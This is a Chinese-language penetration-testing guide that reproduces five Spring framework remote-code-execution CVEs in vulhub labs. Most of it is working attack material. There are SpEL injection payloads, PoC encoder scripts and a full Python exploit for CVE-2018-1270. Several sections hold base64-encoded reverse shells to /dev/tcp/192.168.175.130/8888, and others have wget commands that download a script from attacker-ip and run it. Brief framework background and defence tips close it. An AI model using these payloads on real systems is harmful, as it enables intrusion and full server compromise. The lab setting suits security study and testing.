Spring渗透合集
字数 1964 2025-08-09 17:09:26
Spring框架渗透测试实战指南
1. Spring框架概述
Spring是Java EE编程领域的一个轻量级开源框架,主要解决企业级开发中的复杂性和松耦合问题。其核心优势在于分层架构,允许开发者选择使用特定组件。
主要组件
- Spring Websocket:内置简单消息代理,处理客户端订阅请求和消息广播
- Spring Data:简化数据库访问,支持云服务
- Spring Data Commons:Spring Data家族所有子项目的基础框架
- Spring Data REST:自动化实现REST接口,符合HAL规范
- Spring Web Flow:Spring MVC扩展,支持基于流程的应用程序开发
2. Spring Security OAuth2远程命令执行(CVE-2016-4977)
影响版本
- Spring Security OAuth2 2.0.0-2.0.9
- Spring Security OAuth2 1.0.0-1.0.5
漏洞复现步骤
- 环境搭建:
cd vulhub-master/spring/CVE-2016-4977
sudo docker-compose up -d
-
漏洞验证:
访问http://target-ip:8080/oauth/authorize?response_type=${233*233}&client_id=acme&scope=openid&redirect_uri=http://test
使用默认凭证admin/admin登录 -
PoC脚本:
#!/usr/bin/env python
message = input('Enter message to encode:')
poc = '${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s)' % ord(message[0])
for ch in message[1:]:
poc += '.concat(T(java.lang.Character).toString(%s))' % ord(ch)
poc += ')}'
print(poc)
- 命令执行示例:
http://target-ip:8080/oauth/authorize?response_type=${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(119).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(111)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(109)).concat(T(java.lang.Character).toString(105)))}&client_id=acme&scope=openid&redirect_uri=http://test
- 反弹Shell:
使用Base64编码的反弹Shell命令:
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3NS4xMzAvODg4OCAwPiYx}|{base64,-d}|{bash,-i}
优化后的PoC
#!/usr/bin/env python
import base64
message = input('Enter message to encode:')
message = 'bash -c {echo,%s}|{base64,-d}|{bash,-i}' % bytes.decode(base64.b64encode(message.encode('utf-8')))
print(message)
poc = '${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s)' % ord(message[0])
for ch in message[1:]:
poc += '.concat(T(java.lang.Character).toString(%s))' % ord(ch)
poc += ')}'
print(poc)
3. Spring Web Flow远程代码执行(CVE-2017-4971)
影响版本
- Spring WebFlow 2.4.0-2.4.4
触发条件
- MvcViewFactoryCreator对象的useSpringBeanBinding参数设置为false(默认值)
- flow view对象中设置BinderConfiguration对象为空
漏洞复现
- 环境搭建:
cd vulhub-master/spring/CVE-2017-4971
sudo docker-compose up -d
-
漏洞验证:
访问http://target-ip:8080/login,使用任意凭证登录后访问酒店页面并抓包 -
PoC示例:
_(new java.lang.ProcessBuilder("bash", "-c", "bash -i >%26 /dev/tcp/192.168.175.130/8888 0>%261")).start()=vulhub
- 其他利用方式:
- 执行命令:
&_T(java.lang.Runtime).getRuntime().exec("touch /tmp/success")
- 远程下载并执行脚本:
&_T(java.lang.Runtime).getRuntime().exec("/usr/bin/wget -qO /tmp/1 http://attacker-ip:8888/1")
&_T(java.lang.Runtime).getRuntime().exec("/bin/bash /tmp/1")
4. Spring Data REST远程命令执行(CVE-2017-8046)
影响版本
- Spring Data REST < 2.5.12, 2.6.7, 3.0 RC3
- Spring Boot < 2.0.0 M4
- Spring Data release trains < Kay-RC3
漏洞复现
- 环境搭建:
cd vulhub-master/spring/CVE-2017-8046
sudo docker-compose up -d
- PoC示例:
PATCH /customers/1 HTTP/1.1
Host: target-ip:8080
Content-Type: application/json-patch+json
[{
"op": "replace",
"path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname",
"value": "vulhub"
}]
- 命令编码工具:
",".join(map(str, (map(ord, "touch /tmp/a001"))))
- 反弹Shell:
使用Base64编码的反弹Shell命令:
",".join(map(str, (map(ord, "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3NS4xMzAvODg4OCAwPiYx}|{base64,-d}|{bash,-i}"))))
5. Spring Messaging远程命令执行(CVE-2018-1270)
影响版本
- Spring Framework 5.0-5.0.4
- Spring Framework 4.3-4.3.14
漏洞复现
- 环境搭建:
cd vulhub-master/spring/CVE-2018-1270
sudo docker-compose up -d
- PoC脚本:
#!/usr/bin/env python3
import requests
import random
import string
import time
import threading
import logging
import sys
import json
logging.basicConfig(stream=sys.stdout, level=logging.INFO)
def random_str(length):
letters = string.ascii_lowercase + string.digits
return ''.join(random.choice(letters) for c in range(length))
class SockJS(threading.Thread):
def __init__(self, url, *args, **kwargs):
super().__init__(*args, **kwargs)
self.base = f'{url}/{random.randint(0, 1000)}/{random_str(8)}'
self.daemon = True
self.session = requests.session()
self.session.headers = {
'Referer': url,
'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'
}
self.t = int(time.time()*1000)
def run(self):
url = f'{self.base}/htmlfile?c=_jp.vulhub'
response = self.session.get(url, stream=True)
for line in response.iter_lines():
time.sleep(0.5)
def send(self, command, headers, body=''):
data = [command.upper(), '\n']
data.append('\n'.join([f'{k}:{v}' for k, v in headers.items()]))
data.append('\n\n')
data.append(body)
data.append('\x00')
data = json.dumps([''.join(data)])
response = self.session.post(f'{self.base}/xhr_send?t={self.t}', data=data)
if response.status_code != 204:
logging.info(f"send '{command}' data error.")
else:
logging.info(f"send '{command}' data success.")
def __del__(self):
self.session.close()
sockjs = SockJS('http://target-ip:8080/gs-guide-websocket')
sockjs.start()
time.sleep(1)
sockjs.send('connect', {
'accept-version': '1.1,1.0',
'heart-beat': '10000,10000'
})
sockjs.send('subscribe', {
'selector': "T(java.lang.Runtime).getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3NS4xMzAvODg4OCAwPiYx}|{base64,-d}|{bash,-i}')",
'id': 'sub-0',
'destination': '/topic/greetings'
})
data = json.dumps({'name': 'vulhub'})
sockjs.send('send', {
'content-length': len(data),
'destination': '/app/hello'
}, data)
6. Spring Data Commons远程命令执行(CVE-2018-1273)
影响版本
- Spring Data Commons 1.13-1.13.10 (Ingalls SR10)
- Spring Data REST 2.6-2.6.10 (Ingalls SR10)
- Spring Data Commons 2.0-2.0.5 (Kay SR5)
- Spring Data Rest 3.0-3.0.5 (Kay SR5)
漏洞复现
- 环境搭建:
cd vulhub-master/spring/CVE-2018-1273
sudo docker-compose up -d
- PoC示例:
POST /users?page=&size=5 HTTP/1.1
Host: target-ip:8080
Content-Type: application/x-www-form-urlencoded
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/a001")]=&password=&repeatedPassword=
- 反弹Shell:
- 上传Shell脚本:
/usr/bin/wget -qO /tmp/a002 http://attacker-ip:9999/shell.sh
- 执行脚本:
/bin/bash /tmp/a002
7. Spring家族核心概念
- IOC (控制反转):对象创建和依赖注入由Spring容器管理
- Context (上下文):Spring应用的运行环境
- Bean:被Spring容器管理的Java对象
- AOP (面向切面编程):通过预编译方式和运行期动态代理实现程序功能的统一维护
Spring主要组件关系
- Spring Framework:基础架构,包含Spring MVC、Spring Core等
- Spring MVC:MVC框架,需要大量XML配置
- Spring Boot:简化配置,内置Tomcat
- Spring Security:认证和授权框架
- Spring Cloud:基于Spring Boot的分布式系统开发框架
防御建议
- 及时更新Spring框架和相关组件到最新安全版本
- 禁用不必要的HTTP方法(PATCH等)
- 对用户输入进行严格验证和过滤
- 限制应用程序的权限,避免使用root权限运行
- 使用Web应用防火墙(WAF)防护常见攻击模式